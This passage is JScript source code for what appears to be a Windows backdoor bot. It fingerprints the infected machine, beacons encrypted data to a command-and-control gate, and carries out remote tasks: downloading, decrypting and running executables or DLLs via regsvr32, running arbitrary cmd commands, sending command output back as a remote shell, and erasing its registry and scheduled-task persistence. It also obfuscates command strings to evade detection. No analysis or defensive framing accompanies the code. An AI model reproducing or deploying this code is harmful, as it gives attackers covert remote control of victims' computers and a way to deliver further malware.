}
function os_hwid_install_date() {
var objFSO1;
var objFile;
var dt1;
try {
objFSO1 = obj("Scripting.FileSystemObject");
objFile = objFSO1.GetFile("C:\\Windows\\notepad.exe");
dt1 = new Date(objFile.DateCreated);
} catch (e96) {
try {
objFSO1 = obj("Scripting.FileSystemObject");
objFile = objFSO1.GetFile("C:\\Windows\\winhlp32.exe");
dt1 = new Date(objFile.DateCreated);
} catch (e94) {
return "0";
}
}
if (!dt1) {
return "0";
}
return ascii_to_hex(dt1);
}
function os_version_no_cmd() {
var objFSO;
var verzz;
var Vers1 = "5.1.";
var Vers2 = "5.2.";
var Vers3 = "6.0.";
var Vers4 = "6.1.";
var Vers5 = "6.2.";
var Vers6 = "6.3.";
var Vers7 = "10.0.";
var xNow = "";
var vSplit = [];
var Temp1;
var savTo = "";
try {
objFSO = obj("Scripting.FileSystemObject");
savTo = xTmp + tempNow();
objFSO.CopyFile("C:\\Windows\\notepad.exe", savTo);
verzz = objFSO.GetFileVersion(savTo);
dFile(savTo);
savTo = "";
} catch (e99) {
try {
objFSO = obj("Scripting.FileSystemObject");
savTo = xTmp + tempNow();
objFSO.CopyFile("C:\\Windows\\winhlp32.exe", savTo);
verzz = objFSO.GetFileVersion(savTo);
dFile(savTo);
savTo = "";
} catch (e98) {
return "0";
}
}
if (!verzz) {
return "0";
}
try {
if (verzz.indexOf(Vers1) !== -1) {
xNow = Vers1;
}
if (!xNow) {
if (verzz.indexOf(Vers3) !== -1) {
xNow = Vers3;
}
}
if (!xNow) {
if (verzz.indexOf(Vers4) !== -1) {
xNow = Vers4;
}
}
if (!xNow) {
if (verzz.indexOf(Vers5) !== -1) {
xNow = Vers5;
}
}
if (!xNow) {
if (verzz.indexOf(Vers6) !== -1) {
xNow = Vers6;
}
}
if (!xNow) {
if (verzz.indexOf(Vers7) !== -1) {
xNow = Vers7;
}
}
if (!xNow) {
if (verzz.indexOf(Vers2) !== -1) {
xNow = Vers2;
}
}
Vers1 = "";
Vers2 = "";
Vers3 = "";
Vers4 = "";
Vers5 = "";
Vers6 = "";
Vers7 = "";
if (xNow) {
vSplit = verzz.split(xNow);
if (vSplit[1]) {
Temp1 = vSplit[1];
if (Temp1) {
Build = Temp1;
} else {
Build = "0";
}
}
return xNow;
} else {
return "0";
}
} catch (e99) {
return "0";
}
}
function local_ip2() {
var vStr = "";
var fso;
var file2;
var xRet = "";
var xNow = "";
var vSplit = [];
var xSplit = [];
var i;
var rFile = "";
var xipnow = "";
var ipsList = [];
var itemNow2;
var ret5;
try {
var loc2 = obj("WbemScripting.SWbemLocator");
var svc2 = loc2.ConnectServer(".", "root\\cimv2");
var col2 = svc2.ExecQuery("SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True");
var items2 = new Enumerator(col2);
while (items2.atEnd() === false) {
itemNow2 = items2.item();
if (itemNow2) {
xipnow = itemNow2.IPAddress(0);
if (xipnow) {
ipsList.push(xipnow);
}
}
items2.moveNext();
}
} catch (eip1) {
try {
rFile = xTmp + tempNow();
var r1 = rStr(rInt(4, 8));
ret5 = wmi_command('cmd /v /c set "' + r1 + '=I" && !' + r1 + '!pconf!' + r1 + '!g | f!' + r1 + '!ndstr /R /C:"!' + r1 + '!Pv4 Address" > "' + rFile + '"', 1);
r1 = "";
if (ret5 == false) {
dFile(rFile);
return "0";
}
if (fexist(rFile) === true) {
fso = obj("Scripting.FileSystemObject");
file2 = fso.OpenTextFile(rFile, 1, 0);
if (file2.AtEndOfStream === false) {
vStr = file2.ReadAll();
}
file2.Close();
dFile(rFile);
} else {
return "0";
}
if (vStr) {
vSplit = vStr.split(/\r?\n/);
} else {
return "0";
}
if (vSplit.length >= 0) {
i = 0;
do {
xNow = vSplit[i];
if (xNow) {
xSplit = xNow.split(": ");
if (xSplit.length === 2) {
xipnow = xSplit[1];
if (xipnow) {
ipsList.push(xipnow);
}
}
}
i += 1;
} while (i < vSplit.length);
vSplit = [];
xSplit = [];
} else {
return "0";
}
} catch (e891) {
return "0";
}
}
xipnow = "";
i = 0;
try {
if (ipsList.length <= 0) {
return "0";
}
do {
xipnow = ipsList[i];
if (xipnow && xRet.indexOf(xipnow) === -1 && xipnow !== "0.0.0.0") {
xRet = xRet + xipnow + ",";
}
i += 1;
} while (i < ipsList.length);
xRet = xRet.substring(0, xRet.length - 1);
if (xRet) {
return xRet;
} else {
return "0";
}
} catch (eip2) {
return "0";
}
}
function os_product_no_wmi() {
var key1 = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType";
var reg1;
var rdata1 = "";
try {
reg1 = obj("WScript.Shell");
rdata1 = reg1.RegRead(key1);
if (rdata1.length >= 3) {
if (rdata1 == "WinNT") {
return "1";
} else {
return "3";
}
} else {
return "1";
}
} catch (eos5) {
return "1";
}
}
function bot_header() {
var vParti = "";
var osf = "";
var vNTvers = "";
var vlIP = "";
var b2 = "";
var av11 = "";
var sRet = "";
var uUnicode = "";
var pUnicode = "";
osf = os_version_no_cmd();
if (!osf) {
osf = "0";
}
if (!Build) {
Build = "0";
}
vlIP = local_ip2();
if (!vlIP) {
vlIP = "0";
}
if (myBits() === "64") {
b2 = "1";
} else {
b2 = "0";
}
vNTvers = os_product_no_wmi();
if (!vNTvers) {
vNTvers = "0";
}
av11 = cAV();
table = [];
if (!av11) {
av11 = "0";
}
vParti = os_hwid_install_date();
if (!vParti) {
vParti = "0";
}
uUnicode = remove_non_ascii(UNM);
if (!uUnicode) {
uUnicode = "0";
}
pUnicode = remove_non_ascii(PCN);
if (!pUnicode) {
pUnicode = "0";
}
sRet = "|" + vParti + "|" + av11 + "|" + uUnicode + "|" + pUnicode + "|" + osf + "|" + vNTvers + "|" + Build + "|" + b2 + "|" + vlIP + "|" + BV;
BV = "";
return sRet;
}
function hit_Gate(URL, POSTdata, gResponse, method) {
var Resp = "";
var Temp89 = "";
var con4;
var respzz;
if (SYSTEM === 1) {
con4 = xhr;
} else {
if (method === 1) {
con4 = xhr;
} else {
con4 = con;
}
}
try {
con4.open("POST", URL, false);
} catch (e10) {
if (SYSTEM === 0 && method === 0) {
return hit_Gate(URL, POSTdata, gResponse, 1);
} else {
return "gErr";
}
}
if (gResponse === 1) {
con4.onreadystatechange = function() {
if (con4.readyState === 4) {
if (con4.status === 200) {
respzz = con4.responseText;
if (respzz) {
Temp89 = base91_decode(respzz);
if (Temp89) {
var wo = Temp89.substr(0, Temp89.length - 2);
var KeyNow = Temp89.substr(Temp89.length - 2);
Resp = zzzz4(Rkey + KeyNow, wo);
if (Resp) {
respzz = "";
} else {
Resp = "gErr";
}
} else {
Resp = "gErr";
}
} else {
Resp = "OK";
}
} else {
Resp = "gErr";
}
}
};
}
var keynow = rStr(2);
var rNow = rInt(8, 32);
var not_unique = POSTdata + "|" + rStr(rNow) + "|";
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
var encoded = base91_encode(xCrypted);
var g11 = 0;
if (SYSTEM === 1 || method === 1) {
try {
con4.setOption(2, 13056);
} catch (e411) {
g11 = 1;
}
}
try {
con4.send(encoded);
} catch (e11) {
if (SYSTEM === 0 && method === 0) {
return hit_Gate(URL, POSTdata, gResponse, 1);
} else {
return "gErr";
}
}
if (gResponse === 1) {
return Resp;
}
}
function dExec(zURL, myKey, xPE, xEntryP) {
var ret2 = "";
var Final;
var con2 = con;
var binVariant;
var adb;
var ret6;
var cCommand;
var dq = '"';
try {
con2.open("GET", zURL, false);
} catch (e16) {
return "E";
}
con2.onreadystatechange = function() {
if (con2.readyState === 4) {
if (con2.status === 200) {
try {
adb = obj("ADODB.Stream");
adb.open();
adb.type = 1;
adb.write(con2.responsebody);
adb.position = 0;
adb.Type = 2;
adb.Charset = 437;
binVariant = adb.ReadText();
} catch (ewtf) {
return "E";
}
if (binVariant) {
var ByteArray = tB(binVariant);
var xDecrypted = zzz4Bytes(ByteArray, myKey);
if (mZcheck(xDecrypted)) {
if (xPE === "exe") {
Final = xApp + "\\" + tempNow();
}
if (xPE === "dll") {
Final = xApp + "\\" + tempExtra() + ".ocx";
}
try {
adb.position = 0;
adb.type = 2;
adb.Charset = 437;
adb.WriteText(tS(xDecrypted));
adb.SaveToFile(Final);
adb.close();
} catch (ewtf1) {
return "E";
}
if (xPE === "exe") {
ret6 = wmi_command(dq + Final + dq, 0);
Final = "";
if (ret6 == true) {
ret2 = "OK";
} else {
ret2 = "E";
}
}
if (xPE === "dll") {
var Mitm_exe = "regsvr32.exe";
if (Final) {
var path1 = myEnv("SYSTEMROOT", 0);
if (myBits() === "64") {
path1 += "\\SysWOW64\\" + Mitm_exe;
} else {
path1 += "\\System32\\" + Mitm_exe;
}
switch (xEntryP) {
case "1":
cCommand = " /s /i ";
break;
case "2":
cCommand = " /s /n /i ";
break;
case "3":
cCommand = " /s /u ";
break;
default:
cCommand = " /s /i ";
}
path1 += cCommand + dq + Final + dq;
cCommand = "";
ret6 = wmi_command(path1, 0);
path1 = "";
if (ret6 == true) {
ret2 = "OK";
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
}
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
} else {
ret2 = "E";
}
}
};
try {
con2.send();
} catch (e5) {
return "E";
}
return ret2;
}
function rev_cmd(xCo) {
var fso3;
var rFile = "";
var file6;
var vStr;
var rt1;
try {
if (xCo) {
rFile = xTmp + tempNow();
rt1 = wmi_command("cmd /v /c " + xCo + ' > "' + rFile + '" 2>&1', 1);
if (rt1 == false) {
dFile(rFile);
return "0";
}
if (fexist(rFile) === true) {
fso3 = obj("Scripting.FileSystemObject");
file6 = fso3.OpenTextFile(rFile, 1, 0);
if (file6.AtEndOfStream === false) {
vStr = file6.ReadAll();
}
file6.Close();
dFile(rFile);
} else {
return "0";
}
} else {
return "0";
}
} catch (eg1) {
return "0";
}
try {
if (vStr) {
vStr = vStr.replace(/^\s*$(?:\r\n?|\n)/gm, "");
return vStr;
} else {
return "0";
}
} catch (eg2) {
return "0";
}
}
var mainCommand = "";
var fCore = "";
var fStart = "";
function eTask(fullTask) {
if (fullTask) {
var eState = "0";
var TaskReply;
var x1;
var Note;
var Sp;
var tURL;
var fPasw;
var flink;
var ret77;
var tPE;
var dq2 = "";
var UniqKey = "";
var reg1 = "";
var uName = "";
var r_sh = "";
var ret4;
var startPoint;
var pieces = fullTask.split("|");
var count1 = pieces.length;
if (count1 >= 5) {
var tType = pieces[1];
var tID = pieces[2];
switch (tType) {
case "d&exec":
if (count1 >= 7) {
flink = pieces[3];
tPE = pieces[4];
if (!tPE) {
tPE = "exe";
}
if (flink) {
if (flink.indexOf(",") !== -1) {
Sp = flink.split(",");
tURL = Sp[0];
fPasw = Sp[1];
if (count1 === 8) {
startPoint = pieces[5];
}
if (tURL && fPasw) {
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
eState = "1";
} else {
wmi_waitfor2(1, 0);
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
eState = "1";
}
}
}
}
}
}
TaskReply = PreserveH + "|" + eState + "|" + tID;
hit_Gate(Gate, TaskReply, 0, 0);
break;
case "gtfo":
reg1 = rootK + "\\Environment\\UserInitMprLogonScript";
try {
x1 = obj("WScript.Shell");
} catch (er78) {
x1 = false;
}
if (x1) {
try {
if (rexist(xStore) === true) {
Note = x1.RegRead(xStore);
if (Note && Note.indexOf(",") !== -1) {
Sp = Note.split(",");
uName = Sp[0];
UniqKey = rootK + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + uName;
}
}
} catch (e104) {
UniqKey = "";
}
try {
if (UniqKey && rexist(UniqKey) === true) {
x1.RegDelete(UniqKey);
}
} catch (e80) {
UniqKey = "";
}
try {
if (reg1 && rexist(reg1) === true) {
x1.RegDelete(reg1);
ret77 = "1";
}
} catch (e81) {
ret77 = "0";
}
try {
if (xStore && rexist(xStore) === true) {
x1.RegDelete(xStore);
ret77 = "1";
}
} catch (e84) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
if (fexist(fCore) === true) {
dFile(fCore);
ret77 = "1";
}
} catch (e82) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
if (fexist(fStart) === true) {
dFile(fStart);
ret77 = "1";
}
} catch (e83) {
if (ret77 !== "1") {
ret77 = "0";
}
}
try {
if (uName && SYSTEM === 1) {
ret4 = wmi_command("SCHTASKS.exe /Delete /TN " + uName + " /F", 1);
}
if (ret4 == true) {
ret77 = "1";
}
} catch (e84) {
if (ret77 !== "1") {
ret77 = "0";
}
}
} else {
ret77 = "0";
}
if (!ret77) {
ret77 = "0";
}
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
if (ret77 === "1") {
gtfo = true;
selfdel = true;
}
break;
case "more_onion":
try {
if (fexist(fCore) === true) {
dq2 = '"';
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
ret4 = wmi_command(mainCommand, 0);
if (ret4 == true) {
ret77 = "1";
} else {
ret77 = "0";
}
} else {
ret77 = "0";
}
} catch (e1672) {
ret77 = "0";
}
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
if (ret77 === "1") {
gtfo = true;
}
break;
case "via_c":
if (count1 === 6) {
flink = pieces[3];
if (flink) {
ret4 = wmi_command("cmd /v /c " + flink + " & exit", 0);
if (ret4 == true) {
eState = "1";
} else {
eState = "0";
}
if (!eState) {
eState = "0";
}
TaskReply = PreserveH + "|" + eState + "|" + tID;
hit_Gate(Gate, TaskReply, 0, 0);
}
}
break;
case "more_time":
if (count1 === 6) {
flink = pieces[3];
if (flink) {
r_sh = rev_cmd(flink);
if (r_sh) {
if (r_sh !== "0") {
r_sh = base64_encode(r_sh);
}
} else {
r_sh = "0";
}
TaskReply = PreserveH + "|" + r_sh + "|" + tID + "|" + base64_encode(flink);
r_sh = "";
hit_Gate(Gate, TaskReply, 0, 0);
}
}
break;
}
}
}
}
function main() {
var dq2 = '"';
var HitNow = "";
var ret8;
if (PreserveH === "") {
PreserveH = bot_header();
}
if (xStore === "") {
var valo = "\\Software\\Microsoft\\Notepad\\";
if (SYSTEM === 1) {
xStore = rootK + valo + PCN;
} else {
xStore = rootK + valo + UNM;
}
}
rcon_now += 1;
if (rcon_now >= rcon_max) {
try {
if (fexist(fCore) === true) {
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
ret8 = wmi_command(mainCommand, 0);
if (ret8 == true) {
gtfo = true;
} else {
gtfo = false;2
}
}
} catch (ez12) {
gtfo = false;
}
} else {
HitNow = hit_Gate(Gate, PreserveH, 1, 0);
switch (HitNow) {
case "gErr":
wmi_waitfor(error_retry);
break;
case "OK":
break;
default:
eTask(HitNow);
}
}
if (gtfo === false) {
wmi_waitfor(hit_each);
} else {
if (selfdel === true && fexist(main_mitm) === true) {
wmi_command('cmd.exe /c del "' + main_mitm + dq2, 0);
}
}
}
function go() {
if (check_Net(0) === true) {
if (check_Host(0) === true) {
main();
} else {
wmi_waitfor2(hit_each, 1);
}
} else {
wmi_waitfor2(3, 1);
}
}
function check_inside() {
var x1;
var Note;
var Sp;
var net;
if ((UNM === "") || (PCN === "")) {
try {
net = obj('WScript.Network');
PCN = net.ComputerName;
UNM = net.UserName;
} catch (e781) {
PCN = "pc_error";
UNM = "user_error";
}
}
if (xStore === "") {
var valo = "\\Software\\Microsoft\\Notepad\\";
if (SYSTEM === 1) {
xStore = rootK + valo + PCN;
} else {
xStore = rootK + valo + UNM;
}
}
try {
x1 = obj("WScript.Shell");
Note = x1.RegRead(xStore);
if (Note) {
if (Note.indexOf(",") !== -1) {
Sp = Note.split(",");
if (Sp.length === 3) {
fCore = workingDir + Sp[1] + ".txt";
fStart = workingDir + Sp[2] + ".txt";
if (fexist(fCore) === false) {
return false;
}
if (fexist(fStart) === false) {
return false;
}
if (fexist(main_mitm) === false) {
return false;
}
return true;
} else {
return false;
}
} else {
return false;
}
} else {
return false;
}
} catch (e89) {
if (SYSTEM === 1) {
SYSTEM = 0;
rootK = "HKCU";
xApp = myEnv("APPDATA", 0);
workingDir = xApp + "\\Microsoft\\";
main_mitm = workingDir + "msxsl.exe";
xStore = "";
return check_inside();
} else {
return false;
}
}
}
function sys() {
var sh11;
var tez = "";
var sys123 = "HKEY_USERS\\S-1-5-19\\Environment\\TEMP";
try {
sh11 = obj("WScript.Shell");
tez = sh11.RegRead(sys123);
if (tez) {
return true;
} else {
return false;
}
} catch (e181) {
return false;
}
}
if (sys() === true) {
SYSTEM = 1;
rootK = "HKLM";
xApp = sFolder(35);
if (xApp === false) {
xApp = myEnv("APPDATA", 0);
}
} else {
xApp = myEnv("APPDATA", 0);
}
xTmp = myEnv("TMP", 0) + "\\";
workingDir = xApp + "\\Microsoft\\";
main_mitm = workingDir + "msxsl.exe";
if (check_inside() == true) {
go();
}